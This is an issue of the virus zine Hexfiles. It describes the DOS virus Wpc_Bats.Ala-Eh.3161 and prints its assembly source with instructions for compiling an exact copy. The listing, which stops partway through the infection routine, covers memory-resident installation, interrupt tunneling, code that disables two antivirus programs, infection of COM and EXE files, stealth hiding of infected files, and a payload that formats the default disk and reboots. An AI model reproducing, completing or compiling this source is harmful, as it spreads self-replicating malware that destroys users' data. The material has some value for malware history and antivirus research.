Copy Link
Add to Bookmark
Report
Hexfiles Issue 4 File 010
HEX-FILES No. 4 File 010
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Name : Wpc_Bats.Ala-Eh.3161
Author : A.R.Jr
Origin : Lipa City, Philippines
Resides on top of memory which is allocated through DOS. The memory
allocated is 4032 bytes.
Recognizes memory by using the dword value at 0000:01FC. If the first
20 bytes pointed to by dword pointer is the same as that of the first
20 bytes of the virus' Int 21h handler means that the virus is
resident.
Hooks Int 16h (Function 00h), Int 1Ch and Int 21h (Functions 3Ch,
3Dh, 3Eh, 3Fh, 4202h, 4B00h, 4B01h, 4B03h, 4Eh and 6Ch).
Uses tunneling technique for Int 21h and uses DOS to hook the other
two interrupts.
Searches for and disables the Int 21h handler of Sayha and DieHard.
Infects com and exe programs.
The virus length is 3161 bytes and its infective length is 3161 to
3176 bytes.
Virus is appended to host programs.
Virus is stealth.
Recognizes programs that had already been infected. Checks whether
all bits of FileTime.Second are set. Further verifies an infection by
checking for 20 bytes of the data for its graphics payload.
Payloads:
Randomly displays " a l a - e h !".
Draws, in graphics mode, "ALA-EH!" superimposed in "ALF" in the
middle of the screen an hour after it has gone resident.
Displays the text found at the end of the virus, initially, after
two F1 keypresses. Subsequently, display is made on every F1
keypress. The display, however, is still randomized.
ÜÜÜÜÜ Ü ÜÜÜÜÜ ÜÜÜÜÜ Ü Ü
³ÛÜÜÜÛ³Û ³ÛÜÜÜÛ ÜÜ ³ÛÜÜÜ ³ÛÜÜÜÛ
³ÛÄÄ¿Û³ÛÜÜÜܳÛÄÄ¿Û ³ÛÜÜÜܳÛÄÄ¿Û
ÀÙ ÀÙÀÄÄÄÄÙÀÙ ÀÙ ÀÄÄÄÄÙÀÙ ÀÙ
ÄÄÄÄÄÄ A.R.Jr W P C B A T S ÄÄÄÄÄÄÄ
Checks for alteration/corruption of the above message. If found,
shows the altered/corrupted message, formats disk in the default
drive and executes a reboot.
ÄÄ WPCA3161.ASM STARTS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS CONTAINS DESTRUCTIVE CODES ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*± VIRUS DOES INTENTIONAL DAMAGE ±*WARNING*
;±*WARNING*± ±*WARNING*
;±*WARNING*±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±*WARNING*
;±*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± HEX-FILES No 4 ±±±
;±±±±±± ±±±±±±±±±±± ±±±
;±±±±±± Virus Name: Wpc_Bats.Ala-Eh.3161 ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Author : A.R.Jr. ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± Origin : Lipa City, Philippines ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±± ±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±± Program listing created by Putoksa Kawayan ±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±± ±±±±±±±±±±±±±±±±±±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± COMPILING INSTRUCTION ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ~~~~~~~~~~~~~~~~~~~~~ ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;±±± ±±±
;±±± This virus was originally compiled in TASM 2.0 and could only be ±±±
;±±± compiled without correction in TASM. This should be compiled in ±±±
;±±± one pass which means that nops should be preserved. ±±±
;±±± ±±±
;±±± MASM 5.0 would generate a phase error message when this is ±±±
;±±± compiled. To suppress the error, you would have to add a size ±±±
;±±± override to this instruction: ±±±
;±±± ±±±
;±±± test [CommandComFlag],1 ±±±
;±±± ;<--------------------------- there should be a NOP here ±±±
;±±± ±±±
;±±± This should be coded as: ±±±
;±±± ±±±
;±±± test byte ptr [CommandComFlag],1 ±±±
;±±± nop ±±±
;±±± ±±±
;±±± This would enable MASM to compile the source. Setting a size ±±±
;±±± override would prevent MASM from a generating a NOP right after ±±±
;±±± the instruction. To get an exact copy of the virus, a NOP should ±±±
;±±± be coded as above. Otherwise, you would be creating a new ±±±
;±±± variant of the virus. ±±±
;±±± ±±±
;±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
;
DTA struc
_dReserved db 21 dup (?) ; reserved for next search
_dAttribute db ? ; file attribute
_dTimeStamp dw ? ; file time stamp
_dDateStamp dw ? ; file date stamp
_dLoLen dw ? ; length of file low word
_dHiLen dw ? ; length of file high word
_dFileName db 13 dup (0) ; filename of matched file
DTA ends
ExeHeader struc
_ExeID dw ? ; MZ exe identifier
_ExeMod dw ? ; bytes on last 512 blocks
_ExeBlocks dw ? ; number of 512 blocks (pages)
_ExeRelTab dw ? ; number of relocatable items
_ExeHedSize dw ? ; length in paragraphs of exe header
_ExeMinAlloc dw ? ; minimum memory required in paragraphs
_ExeMaxAlloc dw ? ; maximum memory required in paragraphs
_ExeStkSeg dw ? ; displacement for stack segment in paragraphs
_ExeStkPt dw ? ; initial value of stack pointer
_ExeCxSum dw ? ; checksum value
_ExeCodPt dw ? ; offset if program entry point
_ExeCodSeg dw ? ; displacement for code segment in paragraphs
_ExeRelFrst dw ? ; first relocatable item entry
ExeHeader ends
WpcBatsAlaEh3161 segment 'code'
assume cs:WpcBatsAlaEh3161, ds:WpcBatsAlaEh3161
Ivt02 equ 2*4
Ivt21 equ 21h*4
Ivt7f equ 7fh*4
MotorState equ 3fh
TimerTick equ 6ch
Environment equ 2ch
MemRequired equ ((offset WpcStackPt - offset Relocator+15)/16)+3
VirLen equ offset Timer - offset Relocator
AsciizLen equ 62
ScrWide equ 80
ScrHigh equ 24
org 100h
Relocator:
mov ax,cs
add ax,0
SegVirus equ word ptr $-2
push ax
mov ds,ax
mov [VirusEntrySegment],ax
mov [Psp],es
xor bx,bx
mov si,offset Dropper ; changed by dropper
RelocToVir equ word ptr $-2
push si
retf ; relocate to virus
db 0eah
VirusEntryOffset dw DecryptEntryCode
VirusEntrySegment dw ?
DecryptEntryCode:
mov si,offset EntryCodeMaskBegin ; start decrypting here
std
cli
mov ss,ax
mov sp,si
EntryCodeDecryptKeyReset:
mov di,offset EntryCodeMaskEnd
EntryCodeDecryptLoop:
cmp di,offset EntryCodeMaskKeyEnd
EntryCodeMaskKeyEnd equ $-2
je EntryCodeDecryptKeyReset
dec di
mov es,bx
inc bx
mov bp,sp
shl bx,1
shl bx,1
lodsb
xor al,[di]
mov [bp],al ; no trace
xor es:[bx+2],al
sub bx,4
dec sp
cmp sp,offset EntryCodeMaskEnd ; end of decryption
je EntryCodeMaskEnd
or bx,bx
jz EntryCodeDecryptLoop
EntryCodeMaskEnd:
mov sp,offset WpcStackPt
sti
cld
mov si,offset AlaehMessage ; check for altered text
CheckAlaehMessage:
lodsb
add bl,al
adc bh,0
cmp al,13
jne CheckAlaehMessage
cmp bx,660bh
AlaehMessageCxSum equ word ptr $-2
je CheckIfTsr
call ShowAlaehGraphics ; show altered text
mov ah,19h ; format disk
int 21h
mov dl,al
mov ah,5
mov dh,0
mov ch,0
int 13h
int 19h ; and reboot
CheckIfTsr:
xor ax,ax
mov es,ax
les di,dword ptr es:[Ivt7f]
mov si,offset Int21Handler ; memory resident check
mov cx,5
repe cmpsw
je ExecuteHost
mov es,ax
mov bx,Ivt21
TunnelInt21:
call SaveInt21
RestartTunnel:
mov cx,128
CheckIfFarJump:
cmp byte ptr es:[bx],0eah ; far jump
jne CheckIfNearJump
inc bx
jmp TunnelInt21
CheckIfNearJump:
cmp byte ptr es:[bx],0e9h ; near jump
jne CheckIfShortJump
mov ax,es:[bx+1]
add ax,3
add bx,ax
jmp CheckIfFarJump
CheckIfShortJump:
cmp byte ptr es:[bx],0ebh ; short jump
jne LookForCsOverride
mov al,es:[bx+1]
test al,80h
jz isForwardJump
sub bx,100h
isForwardJump:
add al,2
add bl,al
adc bh,0
jmp CheckIfFarJump
LookForCsOverride:
inc bx
cmp byte ptr es:[bx-1],2eh ; cs override?
loopnz LookForCsOverride
jcxz CheckSWvx
cmp word ptr es:[bx],1effh ; indirect far jump
je GetLocVector
cmp word ptr es:[bx],2effh ; indirect far call
loopnz LookForCsOverride
jcxz CheckSWvx
GetLocVector:
mov bx,es:[bx+2] ; get loc vector
jmp TunnelInt21
ExecuteComHost: ; restore host com
cli
mov ss,ax
mov sp,-2
sti
push ax
mov di,100h
push di
movsw
movsb
mov ds,ax
retf ; and execute
CheckSWvx: ; relay to kill sayha/diehard
call CheckIfSWisTsr
jnc PreparaTsr
jmp RestartTunnel
ExecuteHost:
call MaskSavedHostData ; decrypt host data
mov si,offset SavedHost
mov ax,[Psp]
mov es,ax
cmp word ptr [SavedHost],'ZM' ; is it exe?
jne ExecuteComHost
mov bx,_ExeStkSeg[SavedHost] ; set up host exe
mov ds,ax
add ax,16
add cs:_ExeCodSeg[SavedHost],ax
add ax,bx
cli
mov ss,ax
mov sp,cs:_ExeStkPt[SavedHost]
sti
jmp dword ptr cs:_ExeCodPt[SavedHost] ; and execute it
PreparaTsr:
mov ah,30h
int 21h
cmp al,3 ; no install on dos < 3
jc ExecuteHost
mov es,[Psp]
mov ah,48h
mov bx,-1 ; get free mem
int 21h
cmp ax,7
je ExecuteHost
cmp bx,MemRequired ; enough mem?
ja ReserveMemory
mov ah,4ah
mov bx,-1
int 21h ; allocate all mem?
cmp ax,7
je ExecuteHost
sub bx,MemRequired+1 ; set aside mem for virus
jc ExecuteHost
mov ah,4ah ; make room
int 21h
jc ExecuteHost
mov ax,es:[2]
sub ax,MemRequired+1
jc ReserveMemory
mov es:[2],ax ; rest top of mem
ReserveMemory:
mov bx,MemRequired ; allocate mem virus
mov ah,48h
int 21h
cmp ax,7
je ExecuteHost
mov es,ax ; copy virus to top of mem
xor di,di
mov si,100h
mov cx,(offset VirusDta - offset Relocator)/2
repe movsw
sub ax,16
mov ds,ax
cli
mov ss,ax
mov sp,offset WpcStackPt
sti
push ax
mov ax,offset SetToGoTsr
RelocToMem equ word ptr $-2
push ax
retf ; execute from top of mem
SigSayha db 0fbh,9ch,50h,1eh,0eh,1fh,86h,0c4h ; sig string
dw 6ah ; loc of vector from
SigDieHard db 0fbh,9ch,50h,51h,86h,0c4h,33h,0c9h ; handler entry point
dw 0a1h ; unused by this variant
SaveInt21:
mov [TempInt21Offset],bx ; loc for hook
mov [TempInt21Segment],es
les bx,dword ptr es:[bx]
mov [Int21Offset],bx ; old int 21 handler
mov [Int21Segment],es
ret
ZapSWint21:
mov al,0e9h ; kill sayha/diehard
mov di,dx
stosb ; set jump
movsw ; set displacement
mov bx,dx
stc
ret
CheckIfSWisTsr:
les di,[Int21] ; see if sayha or diehard
mov dx,di ; is active. disable their
mov si,offset SigSayha ; int 21 handler = kill!
mov cx,4
cld
repe cmpsw
je ZapSWint21
mov si,offset SigDieHard
mov di,dx
mov cx,4
repe cmpsw
je ZapSWint21
clc
ret
SetToGoTsr:
call MaskInt21Handler ; decrypt int 21 handler
mov word ptr ds:[100h-15],8 ; set os as mcb owner
;----------- this is to reset those used by the original dropper
mov word ptr [VirusEntryOffset],offset DecryptEntryCode
mov word ptr [RelocToVir],offset DecryptEntryCode
mov word ptr [RelocToMem],offset SetToGoTsr
mov ax,3516h
int 21h
mov [Int16Offset],bx
mov [Int16Segment],es ; save int 16
mov al,1ch
int 21h
mov [Int1cOffset],bx ; save int 1c
mov [Int1cSegment],es
mov ah,0fh
int 10h
mov [VideoMode],al ; save video mode
mov word ptr [Timer],-16 ; set counter to one hour
mov [F1KeypressCount],2 ; set key press count
;<-------------------------------------- there should be a NOP here
mov ax,2516h
mov dx,offset Int16Handler
int 21h ; hook int 16
mov al,1ch
mov dx,offset Int1cHandler
int 21h ; hook int 1c
les di,[TempInt21]
xor ax,ax
mov ds,ax
mov ax,offset Int21Handler
cli
stosw ; hook int 21
mov word ptr ds:[Ivt7f],ax ; set for tsr check
mov ax,cs
stosw
mov word ptr ds:[Ivt7f+2],ax
sti
mov ax,cs
mov es,ax
mov ds,ax
mov cx,5 ; initialize handle table
mov di,offset HandleTable
mov ax,-1
InitHandleTable:
stosw ; make all entries available
add di,AsciizLen
loop InitHandleTable
call MaskSavedHostData
mov si,offset SavedHost
mov bx,[Psp]
mov cx,bx
cmp word ptr [SavedHost],'ZM' ; is host exe?
jne HostIsCom
add si,_ExeCodPt ; set up host exe
mov di,offset HostIp
movsw
lodsw
add bx,16
add ax,bx
stosw
sub si,_ExeRelFrst-_ExeStkSeg
lodsw
add bx,ax
lodsw
EntryCodeMaskBegin:
call InfectCommandCom ; encrypt entry codes
mov es,cx ; and infect command.com
mov ds,cx
cli
mov ss,bx
mov sp,ax
sti
db 0eah ; execute host exe
HostIp dw ?
dw ?
HostIsCom:
mov es,bx
mov di,100h
movsw ; restore overwritten portion of host
movsb
call InfectCommandCom
mov ds,bx
cli
mov ss,bx
mov sp,-2
sti ; execute host com
db 0eah
dw 100h
Psp dw ?
InfectCommandCom:
call SaveRegisters
mov si,offset EntryCodeMaskBegin ; encrypt entry code begin
std
MaskEntryCodeKeyReset:
mov bx,offset EntryCodeMaskEnd
MaskEntryCodeLoop:
cmp bx,offset EntryCodeMaskKeyEnd
je MaskEntryCodeKeyReset
dec bx
lodsb
xor al,[bx]
mov [si+1],al
cmp si,offset EntryCodeMaskEnd ; end of entry code encrypt
jne MaskEntryCodeLoop
test [CommandComFlag],1 ; is host command.com?
;<-------------------------------------- there should be a NOP here
;=======================================================
; MASM 5.0 fix: delete the preceding line and remove
; the ";" at the start of the two lines of instruction
; that immediately below.
;=======================================================
; test byte ptr [CommandComFlag],1
; nop
;=======================================================
jnz HostIsCommandCom
mov es,[Psp]
mov es,es:[Environment]
xor di,di ; get asciiz from environment
xor al,al
cld
mov cx,-1
GetStartOfFileName:
repne scasb
scasb
jnz GetStartOfFileName
mov ax,es:[di+2]
mov di,offset VirusAsciiz
push cs
pop es
cmp ah,':' ;is drive specified?
jne SearchInDefaultDrive
stosw
SearchInDefaultDrive:
mov si,offset CommandCom
mov cx,6
repe movsw
call Infect ; infect command.com
HostIsCommandCom:
call RestoreRegisters
call MaskInt21Handler
ret
MaskInt21Handler:
cld
call SaveRegisters
push bp
pushf
xor dx,dx
mov cx,cs
std
cli
mov cs:[SavedSs],ss
mov cs:[SavedSp],sp
mov si,offset MaskInt21HandlerBegin ; handler mask start
mov ss,cx
mov sp,si
MaskInt21HandlerKeyReset:
mov bx,offset MaskInt21HandlerKeyBegin
MaskInt21HandlerLoop:
cmp bx,offset MaskInt21HandlerKeyEnd
je MaskInt21HandlerKeyReset
MaskInt21HandlerKeyEnd equ $-1
mov bp,sp
dec bx
mov ds,cx
lodsb
xor al,[bx]
mov [bp],al
mov ds,dx
xor ds:[Ivt02],al ; no trace
dec sp
cmp sp,offset AlaehPrompt ; end of handler mask
je MaskInt21HandlerDone
or dx,dx
jz MaskInt21HandlerLoop
MaskInt21HandlerKeyBegin equ $-1
MaskInt21HandlerDone:
mov ax,0
SavedSs equ word ptr $-2
mov ss,ax
mov sp,0
SavedSp equ word ptr $-2
popf
pop bp
call RestoreRegisters
ret
RestoreRegisters: ; pop all regs
pop cs:[ReturnPoint]
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp cs:[ReturnPoint]
VerifyInfection:
mov si,offset StealthBuffer+(offset HorizontalData-offset SavedHost)
mov di,offset HorizontalData
mov cx,10
repe cmpsw ; infection verification
ret
SaveRegisters: ; save all registers
pop cs:[ReturnPoint]
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
jmp cs:[ReturnPoint]
IsFileHandleSaved:
mov ax,cs
mov es,ax
mov ds,ax
mov si,offset HandleTable
mov cx,5
CheckNextEntry:
lodsw
cmp ax,bx ; is handle saved?
je HandleIsSaved
add si,AsciizLen
loop CheckNextEntry ; check next
stc
ret
HandleIsSaved: ; copy saved asciiz
push si
mov di,offset VirusAsciiz
CopySavedAsciiz:
lodsb
stosb
or al,al
jnz CopySavedAsciiz
pop si
clc
ret
MaskSavedHostData: ; encrypt/decrypt host saved data
mov si,offset SavedHost
MaskSavedHostKeyReset:
mov di,offset MaskSavedHostKeyBegin
MaskSavedHostLoop:
cmp di,offset MaskSavedHostKeyEnd
MaskSavedHostKeyEnd:
je MaskSavedHostKeyReset
lodsb
xor al,[di]
dec di
mov [si-1],al
MaskSavedHostKeyBegin:
cmp si,offset FileSlack
jne MaskSavedHostLoop
ret
HideInfectionOnRead:
call RestoreRegisters
popf
pop cs:[ReadCallerOffset]
pop cs:[ReadCallerSegment]
popf
call UseDos ; execute read call
call MaskInt21Handler
jc FailedHideInfectionOnRead
pushf
call SaveRegisters
push ds
pop es
push cs
pop ds
cmp cx,24 ; is read > 24 bytes
jc LenWithInLimit
mov cx,24 ; then just set for 24
LenWithInLimit:
mov si,offset SavedHost ; return to caller orig host code
mov di,dx
cld
repe movsb
call RestoreRegisters
popf
FailedHideInfectionOnRead:
db 0eah ; return to read caller
ReadCallerOffset dw ?
ReadCallerSegment dw ?
ReadFileHandler:
call SaveRegisters
call IsFileHandleSaved
jc PopaPriorToExit
mov al,1
call MovePointerZeroLoHi ; get current ptr location
push ax
or ax,dx ; are we at eof?
pop ax
jnz PopaPriorToExit
call MaskInt21Handler
call GetInfectedFileSavedHost ; prepare to stealth
pushf
call MovePointerStart
popf
jc HideCodePriorToPopA
call VerifyInfection ; is it really infected
je HideInfectionOnRead ; then stealth it
HideCodePriorToPopA:
call MaskInt21Handler
PopaPriorToExit:
call RestoreRegisters
PassToOldDos: ; else send it to dos
popf
push cs:[Int21Segment]
push cs:[Int21Offset]
retf
CloseFileHandler:
call SaveRegisters
call IsFileHandleSaved ; check if handle is saved
jc PopaPriorToExit
mov word ptr [si-2],-1 ; make available that entry
call RestoreRegisters
popf
pop cs:[CloseCallerOffset] ; execute close
pop cs:[CloseCallerSegment]
popf
call UseDos
call MaskInt21Handler
call Infect ; and infect
call MaskInt21Handler
db 0eah ; return to close caller
CloseCallerOffset dw ?
CloseCallerSegment dw ?
StealthFunctions:
cmp bx,1eh ; handle > 30
ja PassToOldDos
cmp ah,3fh ; read
je ReadFileHandler
cmp ah,3eh ; close
je CloseFileHandler
;----------------------------------\/ handles fn 4202h only
cmp al,2 ;is it move pointer based on eof?
jne PassToDos
push dx ;is it a get file len?
or dx,cx
pop dx
jnz PassToDos ;exit if not
call SaveRegisters
call IsFileHandleSaved
jc PopaPriorToExit
call MaskInt21Handler
call GetInfectedFileSavedHost
pushf
mov al,2
call MovePointerZeroLoHi ; move ptr to eof
popf
jc HideCodePriorToPopA
call VerifyInfection ; really infected?
jne HideCodePriorToPopA
call RestoreRegisters
popf
pop cs:[PointerCallerOffset] ; execute call
pop cs:[PointerCallerSegment]
popf
call UseDos
call MaskInt21Handler
pushf
add word ptr cs:[FileSlack],VirLen
sub ax,cs:[FileSlack]
sbb dx,0 ; return to caller orig eof
popf
db 0eah
PointerCallerOffset dw ?
PointerCallerSegment dw ?
Int21Handler:
pushf
sti
cld
cmp ah,3eh ; close file
je StealthFunctions
cmp ah,3fh ; read file
je StealthFunctions
cmp ah,42h ; move file pointer
je StealthFunctions
cmp ah,6ch ; create/open file
je InfectFunctions
cmp ah,4eh ; find first matching file
je InfectFunctions
cmp ah,4bh ; exec
je InfectFunctions
cmp ah,3dh ; open file
je InfectFunctions
cmp ah,3ch ; create file
je InfectFunctions
PassToDos:
popf
push cs:[Int21Segment]
push cs:[Int21Offset]
retf
InfectFunctions:
call SaveRegisters
cmp ah,6ch ; asciiz is in si for 6c
je SkipRegisterSwap
mov si,dx
SkipRegisterSwap:
push cs
pop es
mov di,offset VirusAsciiz ; copy asciiz
mov cx,64
CopyFileNameToAsciiz:
lodsb
stosb
or al,al
loopnz CopyFileNameToAsciiz
jcxz DoneMatch
mov ax,es:[di-4] ; get first two chars of extension
or ax,2020h ; convert to lower case
mov dl,es:[di-2] ; get first last char of extension
or dl,20h ; convert to lower case
cmp ax,'xe' ; is it exe?
jne CheckIfCom
cmp dl,'e'
je DoneMatch
CheckIfCom:
cmp ax,'oc' ; is it com?
jne DoneMatch
cmp dl,'m'
DoneMatch:
call RestoreRegisters
jne PassToDos
popf
call MaskInt21Handler
cmp ah,3dh ; open file
je OpenFileHandler
cmp ah,3ch ; create file
je CreateFileHandler
cmp ah,4eh ; find first
je FindFileHandler
cmp ah,4bh ; exec
je ExecHandler
;----------------- check 6ch action flag -> create if does not exist and...
cmp dx,0101h ; open if exists ;
je ExecLoadHandler ; copy file flags
cmp dx,0112h ; replace if exists ;
je CreateFileHandler
OpenFileHandler:
call StealthRestoreFile
CreateFileHandler:
pop cs:[Int21CallerOffset]
pop cs:[Int21CallerSegment]
popf
call UseDos ; execute call
jc ReturnToCaller
call SaveHandle ; save handle/asciiz
ReturnToCaller:
call MaskInt21Handler
db 0eah ; return to caller
Int21CallerOffset dw ?
Int21CallerSegment dw ?
ExecHandler:
cmp al,3 ; load overlay
je ExecOverlayHandler
cmp al,1 ; load debug
ja ExecUnknHandler
cmp al,0 ; load execute
je ExecLoadHandler
;-------------------------------- \/ ExecDebugHandler
call StealthRestoreFile
pop cs:[ExecCallerOffset]
pop cs:[ExecCallerSegment]
popf
call UseDos ; execute load
call Infect ; infect
call MaskInt21Handler
db 0eah
ExecCallerOffset dw ? ; return to caller
ExecCallerSegment dw ?
FindFileHandler:
pop cs:[ListCallerOffset]
pop cs:[ListCallerSegment]
popf
call UseDos ; execute file find
call FindFileStealth ; stealth it
call MaskInt21Handler
db 0eah ; return to caller
ListCallerOffset dw ?
ListCallerSegment dw ?
ExecLoadHandler:
call Infect ; infect file
call MaskInt21Handler
ExecUnknHandler:
push cs:[Int21Segment] ; execute 4b00
push cs:[Int21Offset]
retf
ExecOverlayHandler:
pop cs:[LoadCallerOffset]
pop cs:[LoadCallerSegment]
popf
call Infect ; infect it
call MaskInt21Handler
call UseDos ; execute load
db 0eah
LoadCallerOffset dw ? ; return to caller
LoadCallerSegment dw ?
SavedHost dw 12 dup (?)
FileSlack dw ?
;
; data format: pairs of word-sized data giving coordinates where to start
; write pixel. first word is row and the next is column
;
HorizontalData dw 178,109,258,109,218,114,378,109,335,80,335,109,335,114
VerticalData dw 80,210,80,220,80,260,80,337,80,380,80,410
AlaehPrompt db 1,' a l a - e h ! '
db 'anti sw' ;<------- not displayed
SaveHandle:
call SaveRegisters
pushf
mov bx,cs
mov ds,bx
mov es,bx
mov cx,5
mov di,offset HandleTable
LookForFreeHandleEntry:
cmp word ptr [di],-1 ; look for free entry
je FoundFreeEntry
add di,AsciizLen+2
loop LookForFreeHandleEntry ; check next
jmp short HandleTableIsFull
FoundFreeEntry:
stosw
mov si,offset VirusAsciiz ; save asciiz
SaveAsciizToHandleTable:
lodsb
stosb
or al,al
jnz SaveAsciizToHandleTable
HandleTableIsFull:
popf
call RestoreRegisters
ret
FindFileStealth:
call SaveRegisters
pushf
mov ah,2fh ; get active dta
call UseDos
mov ax,es:_dTimeStamp[bx]
and al,1fh
cmp al,1fh ; is infected?
jne NotInfected
mov ax,3d02h ; open file
call UseDos
jc NotInfected
push ax
mov ax,cs
mov ds,ax
mov [DtaOffset],bx ; save active dta
mov [DtaSegment],es
mov es,ax
pop bx
call GetInfectedFileSavedHost
jc CloseFile
call VerifyInfection ; is really infected?
jne CloseFile
mov ax,VirLen
add ax,[FileSlack] ; restore orig length of file
les di,[ActiveDta]
sub es:_dLoLen[di],ax
sbb word ptr es:_dHiLen[di],0
CloseFile:
mov ah,3eh ; close
call UseDos
NotInfected:
popf
call RestoreRegisters
ret
StealthRestoreFile:
pushf
sti
cld
call SaveRegisters
call PrepareToInfectFile
jc CleanUp
mov ax,word ptr _dTimeStamp[VirusDta]
and al,1fh
cmp al,1fh ; is file infected?
jne CleanUp
mov ax,4301h
mov cx,20h ; make it write enabled
call UseDos
jc CleanUp
mov ax,3d02h ; open it
call UseDos
jc RestoreRegsBeforeCleanUp
mov bx,ax
call GetInfectedFileSavedHost
jc CloseTheFile
call VerifyInfection ; verify infection
jne CloseTheFile
call MovePointerStart
mov cx,3
cmp word ptr [SavedHost],'ZM'
jne TargetIsCom
mov cx,24
TargetIsCom:
mov ah,40h
mov dx,offset SavedHost ; restore infected file
call UseDos
mov cx,word ptr _dHiLen[VirusDta]
mov dx,word ptr _dLoLen[VirusDta]
add word ptr [FileSlack],VirLen
sub dx,[FileSlack]
sbb cx,0
xor al,al
call MovePointer
xor cx,cx
mov ah,40h
call UseDos ; restore original length
mov cx,word ptr _dTimeStamp[VirusDta]
mov dx,word ptr _dDateStamp[VirusDta]
mov ax,5701h
and cl,0e0h
call UseDos ; clear time stamp mark
CloseTheFile:
mov ah,3eh
call UseDos ; done file restore
RestoreRegsBeforeCleanUp:
call RestoreFileAttribute
CleanUp:
call RestoreDtaErrInt
call RestoreRegisters
popf
ret
Infect:
pushf
sti
cld
call SaveRegisters
call PrepareToInfectFile
jc CleanUp
mov ax,4301h
mov cx,20h ; write enable the file
call UseDos
jc CleanUp
mov ax,3d02h ; open it
call UseDos
jc RestoreRegsBeforeCleanUp
mov bx,ax
mov ax,word ptr _dTimeStamp[VirusDta]
and al,1fh
cmp al,1fh ; is file infected?
jne isCommand
call GetInfectedFileSavedHost
jc CloseTheFile
call VerifyInfection ; is file really infected?
je CloseTheFile
call MovePointerStart
isCommand:
mov [CommandComFlag],1 ; set for command.com
;<-------------------------------------- there should be a NOP here
mov di,offset VirusDta[_dFileName]
mov si,offset CommandCom
mov cx,6
repe cmpsw ; is file command.com?
je isCommandCom
mov [CommandComFlag],0 ; clear flag
;<-------------------------------------- there should be a NOP here
isCommandCom:
mov ah,3fh ; read from start of file
mov cx,24
mov dx,offset ReadBuffer
call UseDos
jc CloseTheFile
mov si,offset ReadBuffer ; and save it
call SaveHostFileData
mov ax,word ptr _dLoLen[VirusDta]
call GetFileSlack
mov [FileSlack],dx ; save num of bytes padded
mov al,2
call MovePointerZeroHi ; move ptr to aligned eof
mov cl,4
cmp word ptr [ReadBuffer],'ZM' ; is file exe?
je TargetIsExe
shr ax,cl ; set com jump to virus
mov ds:[SegVirus],ax
shl ax,cl
sub ax,3
mov byte ptr [ComJumpByte],0e9h
mov [ComJumpDisp],ax
call WriteVirus ; write virus to eof
jnc SetWriteToBeginOfFile
jmp DoneInfect ; short jump not coded short
;<-------------------------------------- there should be a NOP here
TargetIsExe:
cmp dx,0 ; check file length
ja ExeFileLenOk
cmp ax,527 ; infect exes >= 527
jc DoneInfect
ExeFileLenOk:
mov word ptr _dLolen[VirusDta],ax
mov si,_ExeHedSize[ReadBuffer] ; convert length of exe header
shl si,cl ; to bytes
sub ax,si
sbb dx,0
mov _ExeCodPt[ReadBuffer],ax ; set IP
shr ax,cl
sub ax,16 ; adjust for org 100h
mov ds:[SegVirus],ax ; init virus relocator segment
mov ax,dx
mov cx,1000h
mul cx ; convert to paragraph
mov _ExeCodSeg[ReadBuffer],ax ; set CS displacement
add ax,ds:[SegVirus]
mov _ExeStkSeg[ReadBuffer],ax ; set SS displacement
mov word ptr _ExeStkPt[ReadBuffer],offset WpcStackPt ; set SP
call WriteVirus ; write virus to eof
jc DoneInfect
mov dx,word ptr _dHiLen[VirusDta] ; convert len to blocks
mov ax,word ptr _dLoLen[VirusDta]
add ax,VirLen
adc dx,0
mov cx,200h
div cx
or dx,dx
jz PageAligned
inc ax
PageAligned:
mov _ExeMod[ReadBuffer],dx ; set file image
mov _ExeBlocks[ReadBuffer],ax
mov word ptr _ExeMinAlloc[ReadBuffer],123h ; set min alloc
SetWriteToBeginOfFile:
call MovePointerStart
mov dx,offset ReadBuffer
mov cx,24
mov ah,40h
call UseDos
DoneInfect:
mov cx,word ptr _dTimeStamp[VirusDta]
mov dx,word ptr _dDateStamp[VirusDta]
mov ax,5701h
or cl,1fh ; set virus infect mark
call UseDos
mov ah,3eh
call UseDos
